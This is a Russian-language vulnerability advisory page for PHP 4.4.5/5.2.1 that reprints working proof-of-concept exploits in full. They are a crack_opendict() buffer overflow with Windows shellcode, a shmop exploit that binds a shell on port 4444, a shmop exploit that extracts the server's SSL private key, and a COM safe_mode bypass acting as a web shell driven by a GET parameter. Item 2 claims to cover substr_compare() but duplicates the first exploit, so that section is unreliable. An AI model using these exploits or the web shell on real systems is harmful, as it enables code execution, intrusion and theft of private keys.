• Партнер

  • Программа: PHP 4.4.5 / 5.2.1

    Найденные уязвимости позволяют локальному злоумышленнику выполнить произвольный код, получить несанкционированный доступ к конфиденциальной информации и обойти ограничения безопасности на целевой системе.

    1) Уязвимость возникает из-за ошибки в проверке входных данных в функции crack_opendict(). Локальный атакующий может выполнить произвольный код на целевой системе.

    <?php
    //PHP 4.4.6 crack_opendict() local buffer overflow poc exploit
    //win2k sp3 version / seh overwrite method
    //to be launched from the cli

    // by rgod
    // site: http://retrogod.altervista.org

    if (!extension_loaded("crack")){
    die("you need the crack extension loaded.");
    }

    $____scode=
    "\xeb\x1b".
    "\x5b".
    "\x31\xc0".
    "\x50".
    "\x31\xc0".
    "\x88\x43\x59".
    "\x53".
    "\xbb\xca\x73\xe9\x77". //WinExec
    "\xff\xd3".
    "\x31\xc0".
    "\x50".
    "\xbb\x5c\xcf\xe9\x77". //ExitProcess
    "\xff\xd3".
    "\xe8\xe0\xff\xff\xff".
    "\x63\x6d\x64".
    "\x2e".
    "\x65".
    "\x78\x65".
    "\x20\x2f".
    "\x63\x20".
    "start notepad & ";

    $jmp="\xeb\x06\x06\xeb"; // jmp short
    $eip="\x86\xa0\xf8\x77"; // call ebx, ntdll.dll
    $____suntzu.=str_repeat("A",3216);
    $____suntzu.=$jmp.$eip.str_repeat("\x90",12).$____scode;
    crack_opendict($____suntzu);

    ?>

    2) Уязвимость возникает из-за ошибки в проверке входных данных в функции substr_compare().Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.

    <?php
    //PHP 4.4.6 crack_opendict() local buffer overflow poc exploit
    //win2k sp3 version / seh overwrite method
    //to be launched from the cli

    // by rgod
    // site: http://retrogod.altervista.org

    if (!extension_loaded("crack")){
    die("you need the crack extension loaded.");
    }

    $____scode=
    "\xeb\x1b".
    "\x5b".
    "\x31\xc0".
    "\x50".
    "\x31\xc0".
    "\x88\x43\x59".
    "\x53".
    "\xbb\xca\x73\xe9\x77". //WinExec
    "\xff\xd3".
    "\x31\xc0".
    "\x50".
    "\xbb\x5c\xcf\xe9\x77". //ExitProcess
    "\xff\xd3".
    "\xe8\xe0\xff\xff\xff".
    "\x63\x6d\x64".
    "\x2e".
    "\x65".
    "\x78\x65".
    "\x20\x2f".
    "\x63\x20".
    "start notepad & ";

    $jmp="\xeb\x06\x06\xeb"; // jmp short
    $eip="\x86\xa0\xf8\x77"; // call ebx, ntdll.dll
    $____suntzu.=str_repeat("A",3216);
    $____suntzu.=$jmp.$eip.str_repeat("\x90",12).$____scode;
    crack_opendict($____suntzu);

    3) Уязвимость возникает из-за ошибки в проверке входных данных shmop функциями (shmop_read, shmop_write). Локальный атакующий может выполнить произвольный код на целевой системе.

    <?php
      ////////////////////////////////////////////////////////////////////////
      //  _  _                _                     _       ___  _  _  ___  //
      // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
      // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
      // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
      //                                                                    //
      //         Proof of concept code from the Hardened-PHP Project        //
      //                   (C) Copyright 2007 Stefan Esser                  //
      //                                                                    //
      ////////////////////////////////////////////////////////////////////////
      //                PHP ext/shmop Code Execution Exploit                //
      ////////////////////////////////////////////////////////////////////////

      // This is meant as a protection against remote file inclusion.
      die("REMOVE THIS LINE");

      if (!extension_loaded("gd") || !extension_loaded("shmop")) {
        die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
      }

      // This exploit contains a bindshell shellcode for linux x86 from metasploit
      // Therefore it only works with linux x86. It only works in PHP < 5.2.0 because
      // it searches for the shellcode by simply scanning the Apache memory
      // which is not possible with the new memory manager anymore
     
      $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
          "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
          "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
          "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
          "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
          "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
          "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

      function init()
      {
        global $rid;
       
        $rid = imagecreate(10,10);
        imagecolorallocate($rid, 0, 0, 0);
        imagecolorallocate($rid, 0, 0, 0);
      }
     
      function peek($addr, $size)
      {
        global $rid;
        imagecolordeallocate($rid, 0);
        imagecolordeallocate($rid, 1);
        imagecolorallocate($rid, $addr, 0, 0);
        imagecolorallocate($rid, $size, 0, 0);
        return shmop_read((int)$rid, 0, $size);
      }
     
      function poke($addr, $val)
      {
        global $rid;
        imagecolordeallocate($rid, 0);
        imagecolordeallocate($rid, 1);
        imagecolorallocate($rid, $addr, 0, 0);
        imagecolorallocate($rid, strlen($val), 0, 0);
        return shmop_write((int)$rid, $val, 0);
      }

      init();
     
      $arr = array();
      for ($i=0; $i<129; $i++) { $arr[$i] = ""; }
      $arr[$shellcode] = 1;
      for ($i=0; $i<129; $i++) { unset($arr[$i]); }
     
      $offset = 0x08048000 + 1024 * 64;
     
      while (1) {
     
        $data = peek($offset, 1024 + 16);
       
        $position = strpos($data, "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00");
        if ($position !== false && $position < 1024) {
     
          $addr = unpack("L", peek($offset+$position+24, 4));
          $addr = $addr[1] + 32;
          $addr = pack("L", $addr);
         
          poke($offset+$position+32, $addr);
         
          echo "There should be a shell bound to port 4444 now\n\n";
          unset($arr);
          die();
        }
        $offset += 1024;
      }
    ?>

    <?php
      ////////////////////////////////////////////////////////////////////////
      //  _  _                _                     _       ___  _  _  ___  //
      // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
      // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
      // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
      //                                                                    //
      //         Proof of concept code from the Hardened-PHP Project        //
      //                   (C) Copyright 2007 Stefan Esser                  //
      //                                                                    //
      ////////////////////////////////////////////////////////////////////////
      //        PHP ext/shmop SSL RSA Private-Key Disclosure Exploit        //
      ////////////////////////////////////////////////////////////////////////

      // This is meant as a protection against remote file inclusion.
      die("REMOVE THIS LINE");

      if (!extension_loaded("gd") || !extension_loaded("shmop")) {
        die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
      }

      function init()
      {
        global $rid;
       
        $rid = imagecreate(10,10);
        imagecolorallocate($rid, 0, 0, 0);
        imagecolorallocate($rid, 0, 0, 0);
      }
     
      function peek($addr, $size)
      {
        global $rid;
        imagecolordeallocate($rid, 0);
        imagecolordeallocate($rid, 1);
        imagecolorallocate($rid, $addr, 0, 0);
        imagecolorallocate($rid, $size, 0, 0);
        return shmop_read((int)$rid, 0, $size);
      }

      init();
     
      $offset = 0x08048000 + 1024 * 64;
     
      while (1) {
     
        $data = peek($offset, 1024 + 16);
       
        $position = strpos($data, "\x30\x82");
        if ($position !== false && $position < 1024) {
          // Potential Key
          if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") {
            $length = ord($data[$position+2])*256+ord($data[$position+3])+4;
            $keydata = peek($offset + $position, $length);
            // Assume an exponent of 0x10001 to really find a RSA key and not a DSA one
            if (strpos($keydata, "\x01\x00\x01") > 0)
                break;
          }
        }
        $offset += 1024;
      }

      header("Content-type: application/octet-stream");
      header("Content-Disposition: attachment; filename=\"server.der\""); 
      echo $keydata;
    ?>

    4) Уязвимость возникает из-за ошибки в проверке входных данных в PHP COM расширениях. Атакующий может обойти ограничения безопасности Safe_Mode на целевой системе.

    <?php
       //PHP COM extensions (inconsistent Win32) safe_mode bypass

        $____suntzu = new COM("WScript.Shell");
        $____suntzu->Run('c:\windows\system32\cmd.exe /c '.escapeshellarg($_GET[cmd]).' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
        $____suntzoi=file("suntzoi.txt");
        for ($i=0; $i<count($____suntzoi); $i++) {echo nl2br(htmlentities($____suntzoi[$i]));}

       // *quote* from the php manual:
       // There is no installation needed to use these functions; they are part of the PHP core.

       // The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.

       // You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
       // we don't and can't bundle all of those with PHP.
    ?>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии